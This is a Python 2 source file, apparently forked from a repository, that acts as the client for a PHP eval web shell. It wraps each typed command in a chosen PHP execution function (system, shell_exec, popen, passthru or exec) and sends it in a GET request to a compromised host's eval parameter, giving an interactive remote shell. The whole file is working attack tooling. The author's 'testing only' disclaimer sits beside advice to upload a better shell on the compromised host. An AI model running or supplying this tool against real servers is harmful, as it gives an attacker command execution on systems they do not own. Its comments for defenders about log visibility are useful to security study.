forked from infodox/php-eval-shell
shell.py
#!/usr/bin/python
# shell.py
# uses the "test.py" shell.php to give a basic "shell" on target.
# I advise uploading a better shell ASAP
# infodox | insecurety.net
import sys
import requests
# Client half of a PHP eval web shell (Python 2). It wraps each line typed by
# the operator in a PHP call and appends it to a URL that is expected to end
# in an eval-style query parameter, then prints the HTTP response body.
print """
Test Shell.
This "shell" is for testing out different execution functions
on a remote host. The idea is, once you identified a working
system execution function using test.py, you can then use this
to act as a "remote shell" or "terminal emulator" for interacting
with the compromised host.
This is for testing purposes only. Seriously.
- infodox | insecurety.net
"""

# Exactly one argument is accepted: the target URL. Note that the usage path
# exits with status 0, so a wrapper script cannot tell it apart from success.
if len(sys.argv) != 2:
    for usage_line in (
        "Usage: ./shell.py <targeturl>",
        "Example: ./shell.py http://localhost/test.php?eval=",
    ):
        print usage_line
    sys.exit(0)
url = sys.argv[1]

# Menu of PHP execution functions; the first line carries an extra newline.
for menu_line in (
    "Select execution type to use\n",
    "1. system() function",
    "2. shell_exec() function",
    "3. popen() function",
    "4. passthru() function",
    "5. exec() function",
):
    print menu_line
func = raw_input("Function to use: ")

# Menu choice -> (status line, opening part of the PHP call). shell_exec and
# exec are prefixed with "echo"; the other three are sent as bare calls.
php_wrappers = {
    "1": ("[+] Using system", "system('"),
    "2": ("[+] Using shell_exec", "echo shell_exec('"),
    "3": ("[+] Using popen", "popen('"),
    "4": ("[+] Using passthru", "passthru('"),
    "5": ("[+] Using exec", "echo exec('"),
}

# Any other answer falls through and the script ends without output.
if func in php_wrappers:
    status_line, call_prefix = php_wrappers[func]
    print status_line
    while True:
        typed = raw_input("shell:~$ ")
        # The literal word "exit" ends the session locally; nothing is sent.
        if typed == "exit":
            sys.exit(0)
        # The typed text is placed between single quotes with no escaping or
        # encoding done by this script, and the whole snippet rides in the
        # URL of a GET request. For defenders: the PHP function name is part
        # of the request URL, so it is typically visible to access logs and
        # to URL-inspecting filters (exact encoding on the wire is decided by
        # the requests library).
        php_snippet = call_prefix + typed + "');"
        # One request per command; no timeout and no error handling, so an
        # exception from requests.get terminates the loop.
        response = requests.get(url + php_snippet)
        print response.text